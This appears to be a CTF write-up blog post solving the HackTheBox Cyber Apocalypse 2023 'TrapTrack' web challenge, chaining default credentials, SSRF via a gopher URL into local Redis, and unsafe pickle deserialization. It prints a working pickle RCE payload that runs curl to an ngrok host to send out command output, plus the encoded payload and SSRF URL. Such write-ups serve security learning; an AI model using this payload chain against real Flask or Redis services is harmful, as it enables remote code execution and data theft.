---
title: "Traptrack - HackTheBox Cyber Apocalypse 2023"
date: 2023-03-23T13:09:43+01:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - Deserialization
    - SSRF
    - Redis
---

# HackTheBox Cyber Apocalypse 2023

Name  |  URL
--------|---- 
**HTB Cyber Apocalypse 2023**| **https://ctf.hackthebox.com/event/821**

# TrapTrack - Web

## Description 

The aliens have prepared several trap websites to spread their propaganda campaigns on the internet. Our intergalactic forensics team has recovered an artifact of their health check portal that keeps track of their trap websites. Can you take a look and see if you can infiltrate their system?

## Code Review & Exploitation

The first step is the authentication bypass which is pretty simple using default credentials `admin:admin`.

The application is written using Python Flask and using Redis as database, after looking around the application we realize that the server is deserializing data using `pickle.loads`:

```py
# routes.py
@api.route('/tracks/<int:job_id>/status', methods=['GET'])
@login_required
def job_status(job_id):
    data = get_job_queue(job_id)

    if not data:
        return response('Job does not exist!', 401)

    return Response(json.dumps(data), mimetype='application/json')

# cache.py
def get_job_queue(job_id):
    data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
    if data:
        return pickle.loads(base64.b64decode(data))

    return None
```

So as our first input we can use job_id to make pickle deserialize the job stored in the database, but how can we create that job? In `cache.py` we have a function to create a job :

```py
def create_job_queue(trapName, trapURL):
    job_id = get_job_id()

    data = {
        'job_id': int(job_id),
        'trap_name': trapName,
        'trap_url': trapURL,
        'completed': 0,
        'inprogress': 0,
        'health': 0
    }

    current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data)))

    current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

    return data
```

But this is not vulnerable since our input is not a serialized object but only a parameter of data, so we have to find another way to write to jobs. Another interesting thif to review is the `worker` :

```py

def run_worker():
    job = get_work_item()
    if not job:
        return

    incr_field(job, 'inprogress')

    trapURL = job['trap_url']

    response = request(trapURL)

    set_field(job, 'health', 1 if response else 0)

    incr_field(job, 'completed')
    decr_field(job, 'inprogress')

if __name__ == '__main__':
    while True:
        time.sleep(10)
        run_worker()
```

The worker makes a request to our url using `pycurl` and then if there's a response from the request the value of `health` will be 1 otherwise it will be 0. At first, I thought the output of the request had some sort of utility, but later I realized that what we were interested in making requests to the internal network. Looking to `config.py` we can see the configuration of Redis :

```py
class Config(object):
    SECRET_KEY = generate(50)
    ADMIN_USERNAME = 'admin'
    ADMIN_PASSWORD = 'admin'
    SESSION_PERMANENT = False
    SESSION_TYPE = 'filesystem'
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/database.db'
    REDIS_HOST = '127.0.0.1'
    REDIS_PORT = 6379
    REDIS_JOBS = 'jobs'
    REDIS_QUEUE = 'jobqueue'
    REDIS_NUM_JOBS = 100
```

So we can make a request to 6379 local port to create a job, (I found this [blog post](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)). Redis will get every line of the request as a command, so using gopher protocol we can take control over the endpoint. But first we have to create our payload :

```py
import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl "https://foo.eu.ngrok.io/?`./../../../readflag`"')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
```

This is a simple snippet that generates the base64-encoded payload, then we have to set the value to a job with that payload, the `redis-cli` command would look like :

```r
HMSET jobs "1337" "gASVXgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjENjdXJsICJodHRwczovLzFjNGEtODgtMjItODEtMTU1LmV1Lm5ncm9rLmlvLz9gLi8uLi8uLi8uLi9yZWFkZmxhZ2AilIWUUpQu"
```

This will set the job_id 1337 to our payload, so the url will be : 

```
gopher://127.0.0.1:6379/_HMSET%20jobs%20%221337%22%20%22gASVXgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjENjdXJsICJodHRwczovLzFjNGEtODgtMjItODEtMTU1LmV1Lm5ncm9rLmlvLz9gLi8uLi8uLi8uLi9yZWFkZmxhZ2AilIWUUpQu%22
```

Don't forget the `_` character before our payload since Redis doesn't read the first char. Then we would just have to trigger the deserialization making a request to :

```
https://foo/api/tracks/1337/status
```

![<- Not working](/static/HACKING/htb-ca2023-1.png)

![<- Not working](/static/HACKING/htb-ca2023-2.png)

> HTB{tr4p_qu3u3d_t0_rc3!}

# THANKS FOR READING 😊 !!

